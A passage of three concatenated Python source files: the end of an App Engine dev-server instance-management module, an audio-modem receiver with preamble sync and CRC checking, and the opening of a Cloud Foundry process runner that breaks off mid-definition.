self._module_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503)
def _add_instance(self):
"""Creates and adds a new instance.Instance to the Module.
This must be called with _instances_change_lock held.
"""
instance_id = self.get_num_instances()
assert self._max_instances is None or instance_id < self._max_instances
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr = wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst))
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._wsgi_servers.append(wsgi_servr)
self._instances.append(inst)
suspended = self._suspended
if not suspended:
self._async_start_instance(wsgi_servr, inst)
def _async_start_instance(self, wsgi_servr, inst):
_THREAD_POOL.submit(self._start_instance, wsgi_servr, inst)
def _start_instance(self, wsgi_servr, inst):
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
for inst in self._instances:
if inst.can_accept_requests:
return inst
self._condition.wait(timeout_time - time.time())
return None
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or has_file_changes:
with self._instances_change_lock:
if not self._suspended:
self.restart()
def _loop_watching_for_changes(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def get_num_instances(self):
with self._instances_change_lock:
with self._condition:
return len(self._instances)
def set_num_instances(self, instances):
if self._max_instances is not None:
instances = min(instances, self._max_instances)
with self._instances_change_lock:
with self._condition:
running_instances = self.get_num_instances()
if running_instances > instances:
wsgi_servers_to_quit = self._wsgi_servers[instances:]
del self._wsgi_servers[instances:]
instances_to_quit = self._instances[instances:]
del self._instances[instances:]
if running_instances < instances:
for _ in xrange(instances - running_instances):
self._add_instance()
if running_instances > instances:
for inst, wsgi_servr in zip(instances_to_quit, wsgi_servers_to_quit):
self._async_quit_instance(inst, wsgi_servr)
def _async_quit_instance(self, inst, wsgi_servr):
_THREAD_POOL.submit(self._quit_instance, inst, wsgi_servr)
def _quit_instance(self, inst, wsgi_servr):
port = wsgi_servr.port
wsgi_servr.quit()
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def suspend(self):
"""Suspends serving for this module, quitting all running instances."""
with self._instances_change_lock:
if self._suspended:
raise request_info.VersionAlreadyStoppedError()
self._suspended = True
with self._condition:
instances_to_stop = zip(self._instances, self._wsgi_servers)
for wsgi_servr in self._wsgi_servers:
wsgi_servr.set_error(404)
for inst, wsgi_servr in instances_to_stop:
self._async_suspend_instance(inst, wsgi_servr.port)
def _async_suspend_instance(self, inst, port):
_THREAD_POOL.submit(self._suspend_instance, inst, port)
def _suspend_instance(self, inst, port):
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def resume(self):
"""Resumes serving for this module."""
with self._instances_change_lock:
if not self._suspended:
raise request_info.VersionAlreadyStartedError()
self._suspended = False
with self._condition:
if self._quit_event.is_set():
return
wsgi_servers = self._wsgi_servers
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[instance_id] = inst
instances_to_start.append((wsgi_servr, inst))
for wsgi_servr, inst in instances_to_start:
self._async_start_instance(wsgi_servr, inst)
def restart(self):
"""Restarts the module, replacing all running instances."""
with self._instances_change_lock:
with self._condition:
if self._quit_event.is_set():
return
instances_to_stop = self._instances[:]
wsgi_servers = self._wsgi_servers[:]
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
instances_to_start.append(inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[:] = instances_to_start
for inst, wsgi_servr in zip(instances_to_stop, wsgi_servers):
self._async_suspend_instance(inst, wsgi_servr.port)
for wsgi_servr, inst in zip(wsgi_servers, instances_to_start):
self._async_start_instance(wsgi_servr, inst)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class BasicScalingModule(Module):
"""A pool of instances that is basic-scaled."""
_DEFAULT_BASIC_SCALING = appinfo.BasicScaling(max_instances='1',
idle_timeout='15m')
_MAX_REQUEST_WAIT_TIME = 10
@staticmethod
def _parse_idle_timeout(timing):
"""Parse a idle timeout string into an int of the value in seconds.
Args:
timing: A str of the form 1m or 10s.
Returns:
An int representation of the value in seconds.
"""
if timing.endswith('m'):
return int(timing[:-1]) * 60
else:
return int(timing[:-1])
@classmethod
def _populate_default_basic_scaling(cls, basic_scaling):
for attribute in basic_scaling.ATTRIBUTES:
if getattr(basic_scaling, attribute) in ('basic', None):
setattr(basic_scaling, attribute,
getattr(cls._DEFAULT_BASIC_SCALING, attribute))
def _process_basic_scaling(self, basic_scaling):
if basic_scaling:
self._populate_default_basic_scaling(basic_scaling)
else:
basic_scaling = self._DEFAULT_BASIC_SCALING
if self._max_instances is not None:
self._max_instances = min(self._max_instances,
int(basic_scaling.max_instances))
else:
self._max_instances = int(basic_scaling.max_instances)
self._instance_idle_timeout = self._parse_idle_timeout(
basic_scaling.idle_timeout)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for BasicScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instances containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(BasicScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_basic_scaling(module_configuration.basic_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# A list of booleans signifying whether the corresponding instance in
# self._instances has been or is being started.
self._instance_running = [] # Protected by self._condition.
for instance_id in xrange(self._max_instances):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
self._instances.append(inst)
self._wsgi_servers.append(wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst)))
self._instance_running.append(False)
self._condition = threading.Condition() # Protects instance state.
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes_and_idle_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
for wsgi_servr, inst in zip(self._wsgi_servers, self._instances):
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
instance_id = inst.instance_id
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
if inst.has_quit:
return self._error_response(environ, start_response, 503)
with self._condition:
if self._instance_running[instance_id]:
should_start = False
else:
self._instance_running[instance_id] = True
should_start = True
if should_start:
self._start_instance(instance_id)
else:
inst.wait(timeout_time)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = (
self._module_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503)
def _start_any_instance(self):
"""Choose an inactive instance and start it asynchronously.
Returns:
An instance.Instance that will be started asynchronously or None if all
instances are already running.
"""
with self._condition:
for instance_id, running in enumerate(self._instance_running):
if not running:
self._instance_running[instance_id] = True
inst = self._instances[instance_id]
break
else:
return None
self._async_start_instance(instance_id)
return inst
def _async_start_instance(self, instance_id):
_THREAD_POOL.submit(self._start_instance, instance_id)
def _start_instance(self, instance_id):
with self._condition:
if self._quit_event.is_set():
return
wsgi_servr = self._wsgi_servers[instance_id]
inst = self._instances[instance_id]
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time and not self._quit_event.is_set():
for inst in self._instances:
if inst.can_accept_requests:
return inst
else:
inst = self._start_any_instance()
if inst:
break
self._condition.wait(timeout_time - time.time())
else:
return None
if inst:
inst.wait(timeout_time)
return inst
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or has_file_changes:
self.restart()
def _loop_watching_for_changes_and_idle_instances(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
self._shutdown_idle_instances()
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def _shutdown_idle_instances(self):
instances_to_stop = []
with self._condition:
for instance_id, inst in enumerate(self._instances):
if (self._instance_running[instance_id] and
inst.idle_seconds > self._instance_idle_timeout):
instances_to_stop.append((self._instances[instance_id],
self._wsgi_servers[instance_id]))
self._instance_running[instance_id] = False
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for inst, wsgi_servr in instances_to_stop:
logging.debug('Shutting down %r', inst)
self._stop_instance(inst, wsgi_servr)
def _stop_instance(self, inst, wsgi_servr):
inst.quit(expect_shutdown=True)
self._async_shutdown_instance(inst, wsgi_servr.port)
def restart(self):
"""Restarts the module, replacing all running instances."""
instances_to_stop = []
instances_to_start = []
with self._condition:
if self._quit_event.is_set():
return
for instance_id, inst in enumerate(self._instances):
if self._instance_running[instance_id]:
instances_to_stop.append((inst, self._wsgi_servers[instance_id]))
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
instances_to_start.append(instance_id)
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for instance_id in instances_to_start:
self._async_start_instance(instance_id)
for inst, wsgi_servr in instances_to_stop:
self._stop_instance(inst, wsgi_servr)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class InteractiveCommandModule(Module):
"""A Module that can evaluate user commands.
This module manages a single Instance which is started lazily.
"""
_MAX_REQUEST_WAIT_TIME = 15
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
use_mtime_file_watcher,
allow_skipped_files,
threadsafe_override):
"""Initializer for InteractiveCommandModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for this module.
host: A string containing the host that will be used when constructing
HTTP headers sent to the Instance executing the interactive command
e.g. "localhost".
balanced_port: An int specifying the port that will be used when
constructing HTTP headers sent to the Instance executing the
interactive command e.g. "localhost".
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instances containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(InteractiveCommandModule, self).__init__(
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances=1,
use_mtime_file_watcher=use_mtime_file_watcher,
automatic_restarts=True,
allow_skipped_files=allow_skipped_files,
threadsafe_override=threadsafe_override)
# Use a single instance so that state is consistent across requests.
self._inst_lock = threading.Lock()
self._inst = None
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on.
The InteractiveCommandModule does not actually listen on this port but it is
used when constructing the "SERVER_PORT" in the WSGI-environment.
"""
return self._balanced_port
def quit(self):
"""Stops the InteractiveCommandModule."""
if self._inst:
self._inst.quit(force=True)
self._inst = None
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.INTERACTIVE_REQUEST):
"""Handles a interactive request by forwarding it to the managed Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants. This must be instance.INTERACTIVE_REQUEST.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
assert inst is None
assert request_type == instance.INTERACTIVE_REQUEST
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
new_instance = False
with self._inst_lock:
if not self._inst:
self._inst = self._instance_factory.new_instance(
AutoScalingModule.generate_instance_id(),
expect_ready_request=False)
new_instance = True
inst = self._inst
if new_instance:
self._inst.start()
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
inst.wait(timeout_time)
except Exception:
# If the instance is restarted while handling a request then the
# exception raises is unpredictable.
if inst != self._inst:
start_response('503 Service Unavailable', [])
return ['Instance was restarted while executing command']
logging.exception('Unexpected exception handling command: %r', environ)
raise
else:
start_response('503 Service Unavailable', [])
return ['The command timed-out while waiting for another one to complete']
def restart(self):
"""Restarts the module."""
with self._inst_lock:
if self._inst:
self._inst.quit(force=True)
self._inst = None
def send_interactive_command(self, command):
"""Sends an interactive command to the module.
Args:
command: The command to send e.g. "print 5+5".
Returns:
A string representing the result of the command e.g. "10\n".
Raises:
InteractiveCommandError: if the command failed for any reason.
"""
start_response = start_response_utils.CapturingStartResponse()
# 192.0.2.0 is an example address defined in RFC 5737.
environ = self.build_request_environ(
'POST', '/', [], command, '192.0.2.0', self.balanced_port)
try:
response = self._handle_request(
environ,
start_response,
request_type=instance.INTERACTIVE_REQUEST)
except Exception as e:
raise InteractiveCommandError('Unexpected command failure: ', str(e))
if start_response.status != '200 OK':
raise InteractiveCommandError(start_response.merged_response(response))
return start_response.merged_response(response)
|
Receiver.py | import copy
import numpy as np
from bitarray import bitarray
import sounddevice as sd
import threading
from utils import *
class Receiver:
def __init__(self, config, debug_data=None):
self.fs = config.fs
self.fc = config.fc
self.header_length = config.header_length
self.data_per_frame = config.DATA_PER_FRAME
self.preamble_wave = config.preamble_wave
self.carrier_wave = config.carrier_wave
self.crc_length = config.crc_length
self.wave_length_per_bit = config.wave_length_per_bit
self.receive_time = config.receive_time
self.audio_in = config.audio_in
self.data = debug_data
self.packet_wo_crc_length = self.header_length + self.data_per_frame
self.packet_length = self.packet_wo_crc_length + self.crc_length
self.buffer = np.array([])
self.write_string = ""
def listen(self):
print("Listening...")
i = 0
stream = sd.Stream(samplerate=self.fs, channels=1, latency="low")
stream.start()
while i < self.receive_time * 10:
record = stream.read(int(self.fs // 10))[0]
lock = threading.Lock()
lock.acquire()
self.buffer = np.append(self.buffer, record)
lock.release()
i += 1
stream.close()
# self.buffer = self.buffer.reshape((self.buffer.size))
# print(self.buffer.size)
print("Listening Finished.")
return None
def packetSync(self):
power = 0
pre_header_index = 0
sync_power_local_max = 0
sync_power_sum = np.ones(self.fs * self.receive_time)
sync_wave_FIFO = np.zeros(self.wave_length_per_bit * 128)
i = 0
while i < self.fs * self.receive_time:
# print(i)
while i >= self.buffer.size:
pass
current_sample = self.buffer[i]
power = power * (1 - 1 / 64) + current_sample ** 2 / 64
# Packet Sync, search preamble
sync_wave_FIFO = np.concatenate((sync_wave_FIFO[1:], np.array([current_sample])), axis=0)
# print(current_sample)
sync_power_sum[i] = np.sum(sync_wave_FIFO * self.preamble_wave, initial=0) / 20 # Correlation
# Find local max which might be the "true" header start
# print(sync_power_sum[i], power, sync_power_local_max)
if (sync_power_sum[i] > power * 2) and (sync_power_sum[i] >= sync_power_local_max) and (
sync_power_sum[i] > 2):
sync_power_local_max = sync_power_sum[i]
pre_header_index = i
# If no new local max is found with 200 wave bits, then recognize it as the true header start
elif (i - pre_header_index > 50) and (pre_header_index != 0):
sync_power_local_max = 0
sync_wave_FIFO = np.zeros(self.wave_length_per_bit * 128)
thread_decode = threading.Thread(target=self.decode, args=(pre_header_index, i))
thread_decode.start()
thread_decode.join()
i += self.wave_length_per_bit * self.packet_length - (i - pre_header_index - 1)
pre_header_index = 0
i += 1
# print(i)
print("Sync return")
return None
def decode(self, pre_header_index, i):
decoded_data = np.array([], dtype=np.uint8)
output_string = ""
# Preamble found, add data into the decode FIFO
residue_num = self.wave_length_per_bit * self.packet_length - (i - pre_header_index - 1)
while (self.buffer.size-i <= residue_num and i <= self.buffer.size):
pass
decode_wave_FIFO = np.concatenate((self.buffer[pre_header_index+1:i], np.array(self.buffer[i:i + residue_num])), axis=0)
# decode_wave_FIFO = np.concatenate((decode_wave_FIFO, np.array([current_sample])), axis=0)
# If FIFO length equals the length of data after modulation
if decode_wave_FIFO.size == self.wave_length_per_bit * self.packet_length:
# decode
decode_FIFO_remove_carrier = smooth(decode_wave_FIFO * self.carrier_wave[:decode_wave_FIFO.size], 5)
decode_FIFO_power_bit = np.zeros(self.packet_length)
for j in range(self.packet_length):
decode_FIFO_power_bit[j] = np.sum(
decode_FIFO_remove_carrier[1+j*self.wave_length_per_bit : 4+j*self.wave_length_per_bit])
decode_FIFO_power_bit = (decode_FIFO_power_bit > 0).astype(np.uint8)
output_string += arr2str(decode_FIFO_power_bit[self.header_length:self.packet_wo_crc_length])
# crc check
id = self.checkCRC(decode_FIFO_power_bit)
decoded_data = np.concatenate(
(decoded_data, decode_FIFO_power_bit[self.header_length:self.packet_wo_crc_length]), axis=0)
lock = threading.Lock()
lock.acquire()
self.write_string += output_string
lock.release()
return decoded_data
def checkCRC(self, decode_FIFO_power_bit):
crc_check = generateCRC(decode_FIFO_power_bit[:self.packet_wo_crc_length], mode='crc-' + str(self.crc_length))
if not (dec2arr(int(crc_check, 16), self.crc_length) == decode_FIFO_power_bit[
self.packet_wo_crc_length:]).all():
print("Crc check ERROR", "\t", dec2arr(int(crc_check, 16), self.crc_length), "\t",
decode_FIFO_power_bit[self.packet_wo_crc_length:])
return -1
else:
temp_index = 0
for k in range(self.header_length):
print(decode_FIFO_power_bit[k], end='')
temp_index = temp_index + decode_FIFO_power_bit[k] * (2 ** (self.header_length - k - 1))
print("\t correct, ID:", temp_index)
return temp_index
def receive(self):
if self.audio_in:
thread_listen = threading.Thread(target=self.listen)
thread_listen.start()
else:
self.buffer = self.data
thread_sync = threading.Thread(target=self.packetSync)
thread_sync.start()
#
if self.audio_in:
thread_listen.join()
thread_sync.join()
bits = bitarray(self.write_string)
output_file = open("outputs/OUTPUT.bin", "wb+")
bits.tofile(output_file)
output_file.close()
return None
|
run.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Program to run Cloudfoundry process inside cloudfoundry/cflinuxfs3 Docker container
"""
__program__ = "runner"
__version__ = "0.1.0"
__author__ = "Jose Riguera"
__year__ = "2021"
__email__ = "<jose.riguera@springer.com>"
__license__ = "MIT"
__purpose__ = """
Runner for CF applications created by staging.py.
"""
import sys
import os
import time
import argparse
import re
import yaml
import logging
import signal
import threading
import uuid
import socket
import json
import pwd
from subprocess import (Popen, PIPE)
from queue import Queue
from collections import deque
from pathlib import Path
####
class Runner(object):
def __init__(self, working_path, env={}, user="", logger=None):
self.working_path = working_path
self.env = env
self.queue = Queue()
self.procs = deque()
self.threads = []
self.user = user
if not logger:
logger = logging.getLogger(self.__class__.__name__)
self.logger = logger
signal.signal(signal.SIGUSR1, self._progagate_signal)
signal.signal(signal.SIGINT, self._progagate_signal)
signal.signal(signal.SIGTERM, self._progagate_signal)
signal.siginterrupt(signal.SIGUSR1, False)
def _set_user(self):
if self.user != "":
try:
pw = pwd.getpwnam(self.user)
uid = pw.pw_uid
except:
self.logger.error("User '%s' not found in the sytem" % (self.user))
raise
self.logger.debug("Setting running user: '%s'" % (self.user))
def changeuser():
os.setgid(uid)
os.setuid(uid)
return changeuser
return lambda: None
def _thread_runner(self, command, env={}, shell=False, wpath=None):
environ = os.environ.copy()
environment = {**self.env, **env}
if environment:
environ.update(environment)
working_path = self.working_path
if wpath != None:
working_path = wpath
kwargs = dict(
cwd = working_path,
shell = shell,
env = environ,
start_new_session = True,
preexec_fn = self._set_user(),
)
this = threading.current_thread()
proc = Popen(command, **kwargs)
start = time.time()
self.logger.debug("Running thread '%s' controlling pid %s: %s" % (this.name, proc.pid, command))
self.procs.append(proc)
rc = proc.wait()
end = time.time()
self.queue.put((this, proc, start, end, rc))
def _progagate_signal(self, signum, frame):
self.logger.info("Propagating signal '%s' to all children ..." % (signum))
for p in self.procs:
if p.poll() is None:
#p.send_signal(signum)
pgrp = os.getpgid(p.pid)
self.logger.debug("Sending signal %s to process group %s" % (signum, pgrp))
os.killpg(pgrp, signum)
def run(self, exit_if_any=False):
result = {}
for thread in self.threads:
thread.start()
counter = len(self.threads)
exited = False
while counter > 0:
# blocks until the item is available
thread, proc, start, end, rc = self.queue.get()
self.logger.debug("Thread %s running pid %s finished with returncode %s" % (thread.name, proc.pid, rc))
self.queue.task_done()
result[thread.name] = (proc.args, proc.pid, start, end, rc)
thread.join()
counter -= 1
if exit_if_any and not exited:
exited = True
processes = [ p.pid for p in self.procs if p.poll() is None ]
if processes:
self.logger.debug("Sending KILL signal to all processes: %s" % (processes))
self._progagate_signal(signal.SIGKILL, 0)
self.threads = []
self.queue = Queue()
self.procs = deque()
return result
def task(self, name, command, env={}, shell=False, wpath=None):
t = threading.Thread(name=name, target=self._thread_runner, args=(command, env, shell, wpath))
t.daemon = True
self.threads.append(t)
class CFManifest(object):
AppParamsDefaults = {
